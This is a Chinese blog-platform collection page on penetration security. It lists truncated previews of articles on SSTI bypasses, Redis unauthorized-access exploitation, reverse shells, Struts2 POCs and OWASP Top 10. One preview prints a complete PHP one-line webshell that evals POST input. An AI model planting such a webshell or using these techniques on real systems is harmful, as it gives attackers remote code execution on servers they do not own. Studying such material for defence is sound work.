寒假前最后一篇文章说来也巧,前两天在ichunqiu上连续做了两道题居然都是模板注入。搜索资料之余也涨了不少见识,下面总结下这类题目的bypas...
投稿
收录了25篇文章 · 15人关注
-
SSTI bypass 总结
-
Redis未授权漏洞利用方式
总结一下redis未授权拿shell: redis-cli -h ip info 查看系统类型 Windows: 1.找网站绝对路径2.conf...
-
Linux 几种反弹shell方式
写简单些给自己用的,省得每次记不住都得靠度娘接收端主机利用nc监听端口 放个nc: https://pan.baidu.com/s/1B0jeh...
-
[WEB] [struts2]整理java中间件漏洞POC
0x01前言 进行了快一年的java中间件的漏洞分析,准备写一篇文章整理记录一下漏洞利用方法,方便大家参考。 0x02POC struts2 S...
-
中间件漏洞总结报告中间件漏洞总结报告 一、 IIS解析漏洞 首先一般文件解析漏洞用于各种上传漏洞中,在文件上传的地方一般会限制用户上传文件的后缀名。在实际环境中I...
-
Linux下几种常见的反弹shell方式最近在做ctf题时碰到一些命令执行题借用命令执行来反弹shell,这里记录一下。 1.bash反弹shell 个人感觉bash反弹是最简单、也是...
-
服务器代理(正向与反向)官方概念 正向代理( Forward Proxy ):是指是一个位于客户端和原始服务器之间的服务器,为了从原始服务器取得内容, 客户端向代理发送...
-
各种一句话
PHP一句话:1、普通一句话<?php @eval($_POST['pass']);?> 2、防爆破一句话<?php substr(md5($_...
-
OWASP TOP 10漏洞及防范
A1 注入 Injection Web安全头号大敌。注入攻击漏洞往往是应用程序缺少对输入进行安全性检查所引起的。攻击者把一些包含攻击代码当做命令...
-
Java中session、cookie、token的区别一.Cookie 1.什么是cookie? Cookie 技术产生源于 HTTP 协议在互联网上的急速发展。随着互联网时代的策马奔腾,带宽等限制...
专题公告
渗透安全教材
{var%20f='http://v.t.sina.com.cn/share/share.php?appkey=1881139527',u=z||d.location,p=['&url=',e(u),'&title=',e(t||d.title),'&source=',e(r),'&sourceUrl=',e(l),'&content=',c||'gb2312','&pic=',e(p||'')].join('');function%20a(){if(!window.open([f,p].join(''),'mb',['toolbar=0,status=0,resizable=1,width=440,height=430,left=',(s.width-440)/2,',top=',(s.height-430)/2].join('')))u.href=[f,p].join('');};if(/Firefox/.test(navigator.userAgent))setTimeout(a,0);else%20a();})(screen,document,encodeURIComponent,'','','https://upload.jianshu.io/collections/images/340894/android.graphics.Bitmap_feda2f7.jpeg', '推荐专题《渗透安全》( 分享自 @简书 )','https://jianshuapi.com/c/4e768b24e648?utm_campaign=maleskine&utm_content=collection&utm_medium=reader_share&utm_source=weibo','页面编码gb2312|utf-8默认gb2312'));){kind=link}